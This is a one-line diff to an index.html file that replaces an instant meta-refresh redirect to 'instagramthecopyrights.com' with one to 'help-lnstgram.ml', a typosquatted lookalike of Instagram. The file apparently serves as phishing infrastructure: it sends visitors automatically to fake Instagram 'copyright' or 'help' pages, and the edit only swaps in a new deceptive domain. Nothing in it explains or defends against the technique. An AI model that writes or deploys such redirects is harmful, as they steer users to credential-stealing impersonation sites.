--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<html><head><meta http-equiv="refresh" content="0;URL=https://instagramthecopyrights.com"></head></html>
+<html><head><meta http-equiv="refresh" content="0;URL=https://help-lnstgram.ml"></head></html>
